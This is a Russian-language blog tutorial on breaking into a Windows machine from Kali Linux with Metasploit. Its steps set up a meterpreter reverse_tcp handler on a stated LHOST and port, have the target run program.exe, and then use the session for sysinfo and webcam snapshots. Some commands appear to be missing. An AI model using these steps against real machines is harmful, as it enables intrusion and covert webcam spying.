взлом Windows с Kali Linux

Thank you for reading this post, don't forget to subscribe!

Kali Linux явля­ет­ся про­из­вод­ным от Debian Linux и он в основ­ном исполь­зу­ет­ся для про­ник­но­ве­ния. Он име­ет более чем 300 пред­уста­нов­лен­ных про­грамм тести­ро­ва­ния про­ник­но­ве­ния. Он под­дер­жи­ва­ет­ся плат­фор­мой Metasploit Framework в про­ек­те Metasploit, инстру­мент для раз­ра­бот­ки и выпол­не­ния экс­плой­тов. Давай­те нач­нем с хака Windows с Кали Linux. Сто­ит отме­тить, что, мы пишем этот пост толь­ко в целях образования.

Дета­ли исход­ной машины:

Kali Linux

 

Целе­вая маши­на, исполь­зу­е­мая для взлома:

 

Шаг 1 . Созда­ние нагрузки

Payload пред­став­ля­ет собой про­грам­му, кото­рая похо­жа как вирус или тро­ян, кото­рые выпол­ня­ют­ся на уда­лен­ной машине для цели взло­ма. Для созда­ния полез­ной нагруз­ки исполь­зу­ет­ся коман­ды напи­сан­ные ниже, кото­рые будут взла­мы­вать windows с Kali Linux.

 

С помо­щью коман­ды ls мы под­твер­ди­ли, что наша про­грам­ма Payload успеш­но созда­на в ука­зан­ном месте.

Шаг 2: Запу­сти­те коман­ду mfsconsole, кото­рая запу­стит запрос msf.

 

Шаг 3:   Для исполь­зо­ва­ния мы исполь­зо­ва­ли сле­ду­ю­щие детали:

  • Порт 4444: вы може­те исполь­зо­вать по ваше­му выбору
  • LHOST IP: IP 192.168.189.128 с Kali Linux. Узнать IP, кото­рый исполь­зу­ет ваша маши­на, мож­но с помо­щью коман­ды Кали.

Теперь дай­те сле­ду­ю­щую коман­ду в стро­ке msf “use exploit/multi/handler

 

Затем дай­те коман­ду “set payload windows/meterpreter/reverse_tcp” в сле­ду­ю­щей строке:

 

Теперь уста­но­ви­те локаль­ный IP и порт, исполь­зуя коман­ду lhost и lport, как пока­за­но ниже:

 

и, нако­нец, исполь­зуй­те команду.

 

Теперь вам нуж­но выпол­нить коман­ду “program.exe” на машине с Windows, как толь­ко она выпол­ня­ет­ся на целе­вой машине, вы може­те в состо­я­нии уста­но­вить сес­сию meterpreter. Про­сто набе­ри­те SysInfo, что­бы полу­чить дета­ли взло­ман­ной маши­ны с Windows.

 

После того как вы успеш­но полу­чи­те дета­ли, вы може­те сде­лать боль­ше в исполь­зо­ва­нии или полу­чить более подроб­ную инфор­ма­цию с помо­щью коман­ды “help“, кото­рая пока­жет все вари­ан­ты, с помо­щью кото­рых вы може­те взло­мать систе­му, напри­мер, что­бы полу­чить коман­ду исполь­зо­вать веб-каме­ра оснаст­ки “webcam_snap” так же, как вы може­те исполь­зо­вать мно­гие доступ­ные опция.